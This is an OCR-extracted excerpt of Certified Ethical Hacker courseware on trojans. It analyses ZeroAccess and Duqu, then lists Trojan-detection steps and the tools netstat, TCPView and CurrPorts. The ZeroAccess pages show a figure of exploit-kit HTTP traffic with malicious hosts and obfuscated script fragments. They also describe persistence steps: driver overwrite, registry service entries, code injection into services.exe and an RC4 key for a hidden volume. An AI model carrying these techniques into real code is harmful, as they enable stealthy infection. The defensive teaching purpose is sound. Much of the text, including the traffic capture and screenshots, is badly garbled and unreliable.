|f5ET / o a n p 9 1 l c m / ? 4 H T T P /1 .1 H o s t: l o v r r u 3 ta r d .o r g yL ‫ן‬ U se r-A g e n t: H o s i l l a / 5 . 0 A c c e p t: t e x t / x m l , a p p l i c a t i q A c c e p t- L a n g u a g e : e n - u s , e n ; q = 0 . 5 A c c e p t-E n c o d in g : g z i p , d e f l a t e A c c e p t-C h a ra e t: I S O - 8 8 5 9 - 1 ,u tf 8 ‫ ; ־‬q - 0 .7 ,* ;q * 0 .7 K e e p - A l i v e : 3 0 0 C o n n e c tio n : k e e p - a l i v e

( ^H
fertifM | EUkjI IlMkM

Main Attack URL

r v s l . 8 . 1 . 1 3 ) G e c k o /2 0 0 8 0 3 1 1 F i r e f o x / 2 . 0 . 0 . 1 3 Ie1n, t‫ ־‬eUS; x t / h t m l ; q * 0 . 9 , t e x t / p l a i n ; q 0 . 8 ‫ ״‬, lm a g e /p n g ,» /‫ ; ״‬q - 0 .5

• c h tx n lx b o d v x d iv id - ' w a g ' x / d i v x d i v i d - ‫ י‬lat ‫ י‬x / d i v x d l v < a !v ld = ‫־‬r a j ‫ < > ׳‬/d lv x c l1 v | ^ T W ^ S b 2 7 ^ t ; u , ‫ ״‬. a , c t , o , ‫ ־‬. k , ‫ ־‬, ‫ נ‬, h , i . e . a c c e p t- e n c o d ln g : pa « _ ' 1 -1 1 .1 ‫״‬ c o n te n t- ty p e : a p p ii 0 ; q < h ; q + + ) ( o + - p ; c ‫ ״‬f . c h a r j s e r - A g e n t : mo _z _ i111 ‫־‬a a/ 4 . 0 C ( j / a ) ; k - p a t .s e I n t ( c , 1 6 ) ; « H o s t: l o v r f n u s ta r d .o r !A c c e p t: t e x t / h t m l , ? m a g e /g i (amp,fid) ;KafbQ3LkY78Y« f ' ; le i■ 7;abs=cun(pya,lei c ‫־‬o n n e c t i o n : k e e p - a l i v e

i d - ’ £rv' x / d i v x d i v i d - ‫ י‬f u d ' x / d i v x d i v i d - ’ hag1 x / d i v ; 5 5 6 0 4 ^ 6 0 1 0 0 0 ; ! 0 . : 5 5 5 2 0 6 5 1 ;.'‫<ו‬ 05 5 1 ‫י‬.,|‫ נ‬H T T F /1 .1

11

Second Stage Exploits

U o p .a v e ) ;u m » - 'Q I P 5 b 5 7 9 0 h t t p / 1 - 1 ok [ o u l ] ; f u n c t i o n s h h ( u ) ( r e j a t e : Tu e . 25 O c t 2 0 1 1 1 5 : 1 9 : 2 0 GMT v , p , » , £ , r ; a - 'P t d 8 E a m l l E 4 ; e r v < > r : A p a c h e / 2 . 2 . 1 7 ( U n ix ) p h p / 5 . 2 . 1 ? Junction 3 ay(v,w,k) (var k- p o w e r e d -B y : p h p / 5 . 2 . 1 7 .o n te n t- L e n g th : 4096 (v, y) > function 0 rc( 0 )(vajr| - o r r t e p ‫ ‘ ־‬- ‫ ־ ך‬. '- ■ ‫ ■ ־‬1/^15 Vce 4 c^T8 4 r3 r 52 5 4 4 c r {S W 5 ^ fT ^ 7 0 1 0 2 OdOc 5 7 0 7 0 4 5e0 2 54 5 4 0 1 0 7 5 c 5 0 0 3 ;1 ; (g, 4) ;ca ' cl)ang2 61n ' ;d-ru T ° " t ! | u 5 e r ‫ ־‬A gent : m 071 1 7 1 1 W 4 .0 (*1miaw5 xp 5 . 1 ) i l l [x] ; a ■ ♦ ■ ♦ ) ( I f (q C1 ! (bar [aj [ < - c a c ^o s t :: T o w u s ta r d . org 10 rd. \ 1 / 3 , s , k , r , a ; 1-'0 57 50 0 77 6 <e®P A c c e p t: t e x t / h t m i . image/gif, i m a g e / g i f , 1mage/1peg, I m a g e / j p e g , ‫׳״‬: :o n n e c tio n : k e e p - a liv e [k] ; ‫♦נ‬ ♦ ) ( try( z-nev Actlv‫־‬r

2 0 0

ZeroAccess Download

m , a; 9 ' ■ ‫ו‬ ‫ז‬ ‫י‬ L d 8 E m 6 Q v , k, z, x, v, 3 , h ,1 ' “ ,51• K ‫־‬ (», 8 ) ;d-‫י‬m Y9g4a5b8at3Idw . i f f (w ) (vac k, y, s, n,u, r, z *

m: p T /u 1e •1 200 0K 2 0 1 1 1 5 : 4 9 : 2 1 GMT :> a te , 25 Oct 3 s e r v e r : A p a c h e / 2 .2 . 1 7 ( u n 1 x ) p h p / 5 . 2 . 1 7 •• < -P 0 w e re d ‫ ־‬B y: p h p / 5 . 2 . 1 7 :o n te n t- L e n g t h : 243712 ( r , 3 ) ; ‫ ב‬- ‫ י‬Q 9 P E 4 3 0 I 0 8 L P tf e ‫< י‬ Z o n t e n t - D i s p o s i t i o n : i n l i n e ; f i1 e n a m e -e m g d E 8 v 6 4 • ° ‫ ־ ׳ ׳‬:o n te n t-T y p e : a p p 1 1 c a t1 o n /0 c te t-s tre a m 8 . . 8F * - p a d : a v o i d b r o w s e r b u g . . p k . < _ c a c h e : m i s s fr o m dom a n .c o m J . E . . < e e p - A l1 v e : t i m e o u t - 1 - L- c o n n e c t i o n : K e e p - A liv i aET p h p ‫>־‬w=19 .e8 2 &f4 4 4 fa 78 M 4 4 di 5 « W i 6 2 4 « & 6 c4 a-i 3 ‫־‬ * o s t: e x e z k z la .c n , , s e r - A g e n t : o p e r a / 6 (w in d o w s mt 5 . 1 ; u ; L a n g iD - 4 0 9 ; x 8 6 ) ‫ י‬C o n n e c tio n : c lo s e

•Y

1

ZeroAccess Download

.

Exploit kit dropping ZeroAccess

http://www.5ymantec.com

Copyright © by EG-C(ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

T ro jan A nalysis: Z eroA ccess (C ont’d)
Source: http://www.symantec.com ZeroAccess can also be installed through web exploit kits. The user is often falsely given the impression they will be installing an update for an application, such as Adobe Flash player. This use of various exploit kits to install ZeroAccess is likely simply a byproduct of its authors attempting to evade IPS rather than an indication of ZeroAccess being sold to other distributors.

Module 06 Page 938

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

SET /0snp91icm/?4 HTTP/ 1 ■1 P/1.1 Hose: lowmustard.org en-US: rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13 User-Agent: Hozilla/5.0 Main Attack URL ■1 1 / text/html; q-0. 9, text/plain;q-0. 0, image/png, */*; q-0.5 Accept: text/xml,applicati Accept-Language: en-us,en;q=0.5 Accept-Encoding: azip,deflate Accept-Charset: ISO-8859-1,utr-8;q-0.7, ; q 0.‫ד‬ Keep-Alive: 300Connection: keep-alive chtmlxbodvxdiv id='wag'x/divxdiv id='lat'x/divxdiv id*'frv'x/divxdiv id=' fud'x/divxdiv id=' haa1 x/div <d!v id‫'־‬raj'></d1 V ><divf=ET /0snp?>11an7, ‫~׳‬H^5027aeebF56a:! dl05eieS60905 5604 5c6801 uC 01‫׳‬ uc5 5! 1 5 6 5 1 0' 51 1 1 5 0 5 . ‫ ׳‬http,/1.1 ‫ב‬r r o n t _ o n rn H 1 nn ■ 1 ‫ל‬ ‫בד ז‬/‫ ־‬1 /H P _ n ‫מרד ־‬ ‫רו רד י ו‬ u, u,a, q,o, z, k,c, j,h, 1 ,c, accept-encoding: pack2 co n ten t- ty p e : ajpp licat 0;q<h;q++) {ot=p: c=f.char user-Aqent: a / 4.0 (w ‫־‬-Agent: mozi M o z ill II
;k‫־‬parselnt(c, 1 6 );wH 0 st: Towmustard. org

Second Stage Exploits

q=.2, q=.<! (anp.fid) ;kat‫' ־‬ bQ3LkY78Y A ccept: te x t/ h tm l, im ag e/gir, 1mage/;)peg, co n nectio n: k e e p - a liv e f 1;l e i 7 ‫;־‬ab3‫־‬run (pya, lei (10p,ave);umm='QIP5&5790 HTTP/1.1 200 OK [oul] ;function shh(u){re Date: Tue, 25 Oct 2011 15:49:20 GMT v,p,w,f ,r;w='Ptd8Ea1rllE4 S e r v e r: A pache/2.2.17 (U n ix ) PHP/5.2.17 function jay(v,m,k) fvar x-Powered-By: PHP/5.2.17 ^ ontent-Length: 4096 (v, y) )function orc(o) (v«J onTejG ‫־‬ET~ V □s‫־‬ n ‫־‬ p'91i cm/^'l5Vce-e 6 8 ‘5 ‫־‬ a‫־‬ f3 ?5 5 4 4 2 ‫־‬ ~ J2 '5 ‫־‬ T851‫־‬ V f 5 70102OdOc 570704 5e02 54 5401075c 5003: 1: (g, 4);c='clkmg26m';d=runconte User-Aqent: Mozi 11 a/4 .0 (windows x p 5 .1 ) [x] ;a++) {if (q(l] (bar [a] [x-cac Host: lc'M nustard.ora l‫׳‬j,z,k,r,a;l-'G575GQ776 Keep- Accept: T ext/htm l, im ag e /g if, image/jpeg, ZeroAccess Download [k] ;‫נ‬++) (try( z=neu Activ:°nne co n nectio n: k e e p - a liv e i n ,a;ro- 9 ‫י‬ Ld6Em6Q' ;a*cun ( ‫מ‬ ‫י‬ ‫ק‬ ‫ן‬ ^ HTTP/1.1 200 OK w, fc , z, x,v, 3 , h, 1, d; z*'ble K-*‫ ׳‬. . D ate: Tue, 25 Oct 2011 15:49:21 GMT (w,8) ;d- ‫»י‬Y9g4a5b8at3 Ida , . s e rv e r: Apache/2.2.17 (u n ix ) p h p /5 .2 .1 7 in ( w ) {var k, y,s,n,u,c2 ‫׳‬r• ••X-Powered-By: PMP/5.2.17 G. .. ' Content-Length: 243712 109* 3;(3,‫)ש‬ PE430I08LPtfe ■ ____Y

.0 . . .

8. .8F x‫ ־‬Pad: avo id browser bug

ZeroAccess Download . .PK. x-cache: m i s s from domain.com >.E.. K eep -A live: tim eo u t=1! co n nectio n: K e e p - A liv < set e§J f fa ? fif d l ^ SJ c ia Host: exe z kz la.cn user-A gent: opera/6 (windows NT 5.1; u; LanglD=409; x86) gent: viz.................................... Juser-A 'c co onn nectio e c tio n: n : clo se

c o n te n t- D is p o s itio n : i n l i n e ; f i lename=emgdE8\/6. ontent-T/pe: a p p lic a t io n /o cte t-stre am

04 4 4

4 4 4 5 6 54 1 0 5 4 6 6 1 3

FIGURE 6.45: Exploit kit dropping ZeroAccess

Module 06 Page 939

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

T ro ja n A n a ly sis: Z ero A c c e ss
(Cont’d)
Upon execution, ZeroAccess selects a random driver alphabetically between % S y s te m % \ D r iv e r s \ c la s s p n p . s y s and % S y s t e m % w in 3 2 k . s y s and overwrites the driver with its own code The original clean driver is stored in a hidden encrypted NTFS volume using the file name

( ^H
(•rtifwd | ttkKJi NmIm

The Trojan then creates the following registry entries to ensure the newly infected driver serves as the main load point for ZeroAccess: e HKEY_LOCAL_MACHINE\SYSTEM\CurrentCont rolSet\Services\[FILE n a m e OF INFECTED DRIVER]\‫׳‬ ‫׳‬ ImagePath ‫״*\" = ״‬ HKEY_LOCAL_MACHINE\SYSTEM\CurrentCont rolSet\Services\[FILE NAME OF INFECTED DRIVER]\"Type" = "1" O HKEY_LOCAL_MACHINE\SYSTEM\CurrentCont rolSet\Services\[FILE NAME OF INFECTED DRIVER] V'Start" = ”3" Code is then injected into services.exe through an APC which encrypts the data stored in the hidden NTFS volume under \ ? ? \ A C P I# P N P 0 3 0 3 # 2 & d a l a 3 f f & 0 \ U and also creates an alternate data stream file % S y s t e m D r iv e % \ 2 3 8 5 2 9 9 0 6 2 : 230 22682 73 . e x e and executes it These main loader components ensure the additional payload files stored in the hidden NTFS volume are loaded and executed

%System%\config\<RANDOM CHARACTERS>
The hidden volume is used to store the original clean driver as well as additional components and downloaded payload modules The volume is roughly 16 M B in size and is accessed through the file system device name: \ \ ? ? \ A C P I# P N P 0 3 0 3 # 2 & d a la 3 f f & 0

m

t'

°Ry

\P

http://www.symantec.com
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

^ T ro jan A nalysis: Z eroA ccess (C ont’d)
Source: http://www.symantec.com Upon execution, ZeroAccess selects a random driver alphabetically between %System%\Drivers\classpnp.sys and %System%win32k.sys and overwrites the driver with its own code. The original clean driver is stored in a hidden encrypted NTFS volume using the file name

%System%\config\<RANDOM CHARACTERS>.
The hidden volume is used to store the original clean driver as well as additional components and downloaded payload modules. The volume is roughly 16 MB in size and is accessed through the file system device name:

\\??\ACPI#PNP0303#2&dala3ff&0
For example, the original clean driver is stored at:

\\??\ACPI#PNP0303#2&dala3ff&0\L\[EIGHT RANDOM CHARACTERS].
This file system of the hidden volume is encrypted using RC4 with the following 128-bit key:

\xFF\x7C\xFl\x64\xl2\xE2\x2D\x4D\xBl\xCF\x0F\x5D\x6F\xE5\xA0\x4 9
The Trojan then creates the following registry entries to ensure the newly infected driver serves as the main load point for ZeroAccess:

Module 06 Page 940

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

© © ©

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[FILE INFECTED DRIVER]\‫״‬ImagePath‫״*\" = ״‬ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[FILE INFECTED DRIVER]\‫״‬Type1" = ‫"״‬ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[FILE INFECTED DRIVER]\‫״‬Start3" = ‫"״‬

NAME NAME NAME

OF OF OF

Code is then injected into services.exe through an APC. The injected code encrypts the data stored in the hidden NTFS volume under \??\ACP1#PNP0303#2&dala3f f &0\u and also creates an alternate data stream file %SystemDrive%\2385299062:2302268273.exe and executes it. These main loader components ensure the additional payload files stored in the hidden NTFS volume are loaded and executed.

Module 06 Page 941

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Troj an A nalysis: Duqu
Duqu is a sophisticated Trojan that acts as a backdoor and facilitates the theft of private information

U rtifW tf IthK Ji lU ik M

CEH

Code section, Duqu payload DLL 1 0 0 0 1 0 0 0
C++ Standard Template Library functions

.100042S O
Native C++ code with STL

1000C2C 9

The code section of the Payload DLL is common for a binary consists of "slices" of code that may have been initially compiled in separate object files before they were linked in a single DLL

Payload Other Language C framework

/

No C++

10023878 Most of them can be found in any C++ program, like the Standard Template Library (STL) functions, run-time library functions, and user-written code, except the biggest slice that contains most of C&C interaction code 10028F2C

Native C+ code with STL Run-Time library code

+

1002EA D 1 100M OM

Native C code for injection API thunks. Exception handlers

http://www.securelist.com
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited

£

3 ^

TrojanAnalysis: D ut* u
Source: http://www.securelist.com

Duqu is a sophisticated Trojan that acts as a backdoor and facilitates the theft of private information. The code section of the Payload DLL is common for a binary that was made from several pieces of code. It consists of "slices" of code that may have been initially compiled in separate object files before they were linked in a single DLL. Most of them can be found in any C++ program, like the Standard Template Library (STL) functions, run-time library functions, and user-written code, except the biggest slice that contains most of C&C interaction code.

Module 06 Page 942

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Code section, Duqu payload DLL
.loooitxio C++ Standard Template Library functions .100042SO Native C++ code with STL .1000CZC9

Payload Other Language / C framework No C++

.10023878 Native C++ code with STL -10028F2C Run-Time library code • 1002EAD1 .100300A4 Native C code for injection API thunks. Exception handlers

FIGURE 6.46: Duqu Tool Screenshot

Module 06 Page 943

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Trojan Analysis: Duqu Framework
D uqu F ra m e w o rk C o d e P ro p e rtie s S S Everything is wrapped into objects Function table is placed directly into the class instance and can be modified after construction There is no distinction between utility classes (linked lists, hashes) and user-written code Objects communicate using method calls, deferred execution queues, and event-driven callbacks There are no references to runtime library functions; native Windows API is used instead
M

CEH

E ve n t D riven F ra m e w o rk Event objects, based on native Windows API handles Thread context objects that hold lists of events and deferred execution queues Callback objects that are linked to events Event monitors, created by each thread context for monitoring events and executing callback objects Thread context storage manages the I list of active threads and provides access to per-thread context objects I

S

S

S

http://www.securelist.com
Copyright © by EG-C(ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

r ^1 —‫ן‬

T ro jan A nalysis: D uqu F ra m e w o rk
Source: http://www.securelist.com This slice is different from others, because it was not compiled from C++ sources. It contains no references to any standard or user-written C++ functions, but is definitely object-oriented. It is called the Duqu Framework.
Duqu Framework Code Properties

The code that implements the Duqu Framework has several distinctive properties: 9 9 Everything is wrapped into objects Function table is placed directly into the class instance and can be modified after construction There is no distinction between utility classes (linked lists, hashes) and user-written code Objects communicate using method calls, deferred execution queues and event-driven callbacks

9

9

Module 06 Page 944

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

9

There are no references to run-time library functions; native Windows API is used instead

Event-Driven Framework The layout and implementation of objects in the Duqu Framework is definitely not native to C++ that was used to program the rest of the Trojan. There is an even more interesting feature of the framework that is used extensively throughout the whole code: it is event driven. There are special objects that implement the event-driven model: 9 Event objects, based on native Windows API handles

Q Thread context objects that hold lists of events and deferred execution queues Q Callback objects that are linked to events

© Event monitors, created by each thread context for monitoring events and executing callback objects © Thread context storage manages the list of active threads and provides access to perthread context objects

Module 06 Page 945

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Trojan Analysis: Event D riven Fram ew ork

C EH
0

J This event-driven model resembles Objective C and its message passing features,
but the code does not have any direct references to the language, neither does it look like compiled with known Objective C compilers

0

0

Object 2

Object 2

Event Object

*L--- X--Event Monitor Thread Context: Event and Call Queue

Event Object

...........

Event Monitor H --*--Thread Context: Event and Call Queue

Callback Object Object 1

Callback Object Object 1

........... •>

‫־*־‬
Thread Context Storage Thread Context Storage

http://www. securelist,com
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

T ro jan A nalysis: E vent D riv en F ram e w o rk
Source: http://www.securelist.com The event-driven model resembles Objective C and its message passing features, but the code does not have any direct references to the language, neither does it look like it is compiled with known objective C compilers.

Object 2

Object 2

y Event Object Event Monitor Event Object Event Monitor

--------- * -------Callback Object Object 1 ‫י‬ 4 Callback Object Thread Context: Event and Cali Queue ........... » Object 1

--------- *--------Thread Context: Event and Call Queue

Thread Context Storage

Thread Context Storage

FIGURE 6.47: Event Driven Framework

Module 06 Page 946

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

M odule Flow
So far, we have discussed how a Trojan infects a system and the types of Trojans available. Now we will discuss how to conduct Trojan detection. Trojan detection helps in detecting the presence of Trojans on an infected system and thus helps you in protecting the system and its resources from further loss.

Trojan Concepts

Countermeasures

,‫• נ‬

Trojans Infection

f | j| | ‫ ־‬Anti-Trojan Software

■ 4
^—

v‫— ׳‬

Types of Trojans

^

1 Penetration Testing

f ^

Trojan Detection

This section focuses on Trojan detection using various techniques or methods.
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Module 06 Page 947

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Scan for suspicious OPEN PORTS

Scan for suspicious STARTUP PROGRAMS

■ > 4

Scan for suspicious RUNNING PROCESSES

Scan for suspicious FILES and FOLDERS

Scan for suspicious REGISTRY ENTRIES

Scan for suspicious NETWORK ACTIVITIES

9
Scan for suspicious DEVICE DRIVERS installed on the computer

0
Scan for suspicious modification to OPERATING SYSTEM FILES

9
Scan for suspicious WINDOWS SERVICES

0
Run Trojan SCANNER to detect Trojans

9

0

Cbpyright © by EC-CMMCil. All Rights Jte$ervfed'.;Reproduction is Strictly Prohibited.

How to D etect T ro jan s
Trojans are malicious programs that masquerade as a useful or legitimate file but their actual purpose is to take complete control over your computer, thereby accessing your files and confidential information. In order to avoid such unauthorized access and to protect your files and personal information, an antivirus product has to be used, which automatically scans and detects the presence of Trojans on your system or you can also detect the Trojans installed on your system manually. The following are the steps for detecting Trojans: 1. Scan for suspicious OPEN PORTS 2. Scan for suspicious RUNNING PROCESSES 3. Scan for suspicious REGISTRY ENTRIES 4. Scan for suspicious DEVICE DRIVERS installed on the computer 5. Scan for suspicious WINDOWS SERVICES 6. Scan for suspicious STARTUP PROGRAMS 7. Scan for suspicious FILES and FOLDERS 8. Scan for suspicious NETWORK ACTIVITIES 9. Scan for suspicious modification to OPERATING SYSTEM FILES 10. Run Trojan SCANNER to detect Trojans
Module 06 Page 948 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

S B

Trojans open unused ports in victim machine to connect back to Trojan handlers Look for the connection established to unknown or suspicious IP addresses

C:\Wi ndows\system32\cmd.exe
J:\ U s e r s \ A d m ir O n e ts ta t -an|

Si

x

Ic tiv e Connections P ro to TCP TCP TCP TCP TCP TCP
tpp

L o c a l A d d re s s 0 .0 .0 .0 :1 3 5 0 .0 .0 .0 :4 4 5 0 .0 .0 .0 :5 5 4 0 .0 .9 .0 : 1 0 2 5 0 . 0 . 0 .0 : 1 0 2 6 0 .0 .0 . 0 : 1 0 2 7
n n 0 a: 1 0 9 f t

S ta te

LISTENING
L I S T E N IN G

LISTENING
L IS T E N IN G

LISTENING
L IS T E N IN G

I.IQTPNINH

TCP TCP TCP
TCP

0 .0 .0 .0 : 1 0 2 9 0 .0 . 0 . 0 : 2 0 6 ? 0 .0 .0 .0 :5 3 5 7
0 . 0 . a . 0 :1 0 2 4 3

LISTENING
L IS T E N IN G

LISTENING
L I S IE N I N G

TCP TCP
TC P

0 .0 .0 .0 : 2 2 3 5 0 1 2 7 .0 .0 .1 : 1 2 0 2 5
1 2 7 .0 .0 .1 :1 2 0 8 0

LISTENING LISTENING
L IS T E N IN G E S T A B L IS H E D

TCP
TC P

1 2 7 .0 .0 .1 : 1 2 0 8 0
1 2 7 .0 .0 .1 :1 2 0 0 0

System Administrator

ESTABLISHED

TCP

1 2 7 .0 .0 .1 : 1 2 1 1 0

LISTENING

<
r 5 i 8 ‫־‬8 ‫ ' ־‬J : r S I J 8 r S i 8 ‫־‬8 ‫ ' ־‬I : TS888 J S A * 8 8 ‫ '־‬I : I S08H (n rin c N J S V 8 ‫־‬8 ‫ ־‬T:2382S IS .V H 'N 'I ‘ 23828 .‫_־‬ .‫־‬ fj

>
riZlEM IH C K ld B riZ H E D E2IW Bn 2HED ■Copyrif;ht © by EG-Gouncil. All Rights Jteservfed.;Reproduction is Strictly Prohibited.

:

a

0 ‫ כ‬S canning for S uspicious P orts □

Trojans open unused ports on the victim's machine to connect back to the Trojan handlers. These Trojans can be identified by scanning for suspicious ports. Scan for suspicious ports and look for the connection established to unknown or suspicious IP addresses.
31 C:\Windows\system32\cmd.exe

C:\Users\Adnin'netstat -an Act iue Connect ions Proto TCP ICP TCP ICP ICP ICP ICP TCP ICP TCP ICP ICP ICP ICP ICP ICP TCP Local Address 0.0.0.0:135 0.0.0.0:445 0.0.0.0:554 0.0.0.0:1025 0.0.0.0:1026 0.0.0.0:102? 0.0.0.0:1028 0.0.0.0:1029 0.0.0.0:2869 0.0.0.0:5357 0.0.0.0:10243 0.0.0.0:22350 12?.0.0.1:12025 127.0.0.1:12080 127.0.0.1:12080 127.0.0.1:12080 127.0.0.1:12110 Foreign Address 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 127.0.0.1:53850 127.0.0.1:53852 0.0.0.0:0 State LISTENING LISIENING LISTENING LISIENING LISTENING LISIENING LISIENING LISIENING LISIENING LISIENING LISIENING LISTENING LISIENING LISTENING ESTABLISHED ESTABLISHED LISTENING

Type n e t s t a t

—a n

in command prompt

System Administrator

FIGURE 6.48: Scanning for Suspicious Ports

Module 06 Page 949

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Port M onitoring Tools: TCPView and C urrPorts
TCPView is a Windows program that will show detailed listings of all TCP and UDP endpoints on your system, including the local and remote addresses and state of TCP connections CurrPorts is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local computer

TCPView - Sysintemals: www.sysintemals.com Fie Opticns Piocesi View Hdp Rerwte 123.17S32U7 123.17S3?1<7 123.175 32.133 123 ITS 3?1‫מ‬ 123.17632.153 f 13953 ISMfrt Rem ote P ort N < p Nr. Ntp Nt> Nv Nv

THO
Sm* TlMf.WAII E$T«U$HED pstab!

gr
| F*e Ed* V!cw Option? Hdp

C urrPorts

-!m l-Pt
local Po*... Local Add‫׳‬m i ittkmp :5dp wi-ditco... wi-dmo. [::]:500 [C111900 [::1:3702 [::]:3702 wvdtoco... [::]:3702 ■ptec• ‫[ אזמו‬::]:4)00 llmnr [1:1:5355 [::]:5122S [l«d0!:b9M:d01.H [::1JS9294 [::]:62056 [::1:62060 10.00.12:49244 10.00.12:49245 10.00.12:492*2 10.00.12*9253 10.00.12*9254 Remote... Remote _ A

x a i % V V -J S ' « 0 3
€ c*«cre»9
t :;> *»< »Pfry:

C c**re»« C !e

0 TCP m tcp 772 tcp 772 TCP 772 TCP 772 TCP 772 TCP 77} TCP 773 TC P 773 TC P 773 TC P >1X0 TC P • 3*0 ‫ ז‬cp 3576 TCP ‫הו‬ ‫זד‬. tcp 1B 7S TC P 876‫ נ‬TC P 3876 TC P 3676 TC P 31*6 TC P 3668 ‫י‬ 644 S 44 516 TC P TCP TCPV6 TCP

LocdAddesi w > « w infm ‫־‬ »W 1.«M 1 wn n v ?‫־‬ »W 1 .«k 4 1 wnm?«leMk41 wn m v«lf**k41 m mw:lcMk4l wnmw*>*k4l

4 1 ^ 4 ‫«ו‬ ‫ל‬ ‫־‬ ‫מ‬ 1 ‫ל‬ * ‫׳‬

Proem N* ♦ ♦ • « • ♦ ♦ ♦ • • • ♦ • 0 ® ♦ C < Syjtcr• $y««m Sytten S>ll*m Sy*fT‫״‬ Syihm SjTMm Sytten Sytten Sytlrm Syitcm Syaem Unknown Unknown Unknown Unknown Unknown

Procn... 864 1940 1940 900 1375 BM 47• 1376 1040 1940 1940 900

Plotocol UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP TCP TCP TCP TCP TCP

Local Por 500 1900 3702 3702 3702 45C 0 5355 51225 59293 $9294 62058 62060 49244 4924S 492S2 49253 49254

C ST tfU SH FD aosc.w,»iT r?T*«jy-(rr»
r‫־‬-‫*־‬n1 ‫־‬ .rrr> I »H4B. • li !• tSHrtJ44D

W lN W iO C ir
WNMSSEICMK WNMr^imK
m 1u ‫־‬l£kU41 m «m »*eUUk41 Mnfim -kV.4141 mn-imnlcMMI

W N M r.n rK 4 K

wp11 MO Invl rp . N ? > 1 2 3 .1 7 5]?.14/ N tp m /w V l1 1 1 1 • rf«V I Ntp m iW l1 1 1ft rrfiV I WIN MSiEL C f.4K (1 WWMSSEICMK 0 loedhotf 105? !‫־‬.‫־‬fllhM f 1051 h3»HB91«IOO tapi r‫׳‬f.V I Ntpi m / v fl3 1 1 6 « W *|p 1 1 ’!‫״‬ mWUll& •(><.! I•... Ittpi 4262 3026 3026 102$ I... Itto WIN MSSELCW K .0 whm ewlck4k41 0 W U J MSSELCMK 0

1< p13M 0fcrrfeo N t>

1 1 * 1 1 L « S I€ H 1 r g &

E S T « M jy 4 (D
t s t a n ,4 i:! [Siettjy-tfD

‫ ז‬5‫»ז‬4 *^‫<זז‬

0
0 0 0 0

un-fist*W‫׳‬.<k41 WN+t$SELCK4K.. w inm saW <.4k41 W NMSSELCK4K Listening: 28

LlSIENIUi LISTEM I3.‫־‬ l«TEW\3

80 ao ao 80 80

http http http http Wtp

*

Eflabfehe* 22

53 Total Ports, ‫ ו‬R&nou Connections, 1Selected

> NirSott Proevyare. mtt»vrww.rur*ottn

http://technet.microsoft.com

http://www. nirsoft.net
Copyright © by EG-CMMCil. All Rights ^pS'ervfed'.;Reproduction is Strictly Prohibited.

P ort M o n ito rin g Tools: TCPView a n d C u rrP o rts
TCPView
Source: http://technet.microsoft.com TCPView is a Windows program that shows detailed listings of all TCP and UDP endpoints on the system, including the local and remote addresses and the state of TCP connections. On Windows NT, 2000, and XP, TCPView also reports the name of the process that owns the endpoint. It provides a more informative and conveniently presented subset of the Netstat program that is shipped with Windows. It works on Windows NT/2000/XP and Windows 98/ME. When TCPView runs, it enumerates all active TCP and UDP endpoints, resolving all IP addresses to their domain name versions. On Windows XP systems, TCPView shows the name of the process that owns each endpoint. By default, TCPView is updated every second. Endpoints that change state from one update to the next are highlighted in yellow; those that are deleted are shown in red, and new endpoints are shown in green. The user can close established TCP/IP connections (those labeled with a state of ESTABLISHED) and save TCPView's output window to a file as well.

Module 06 Page 950

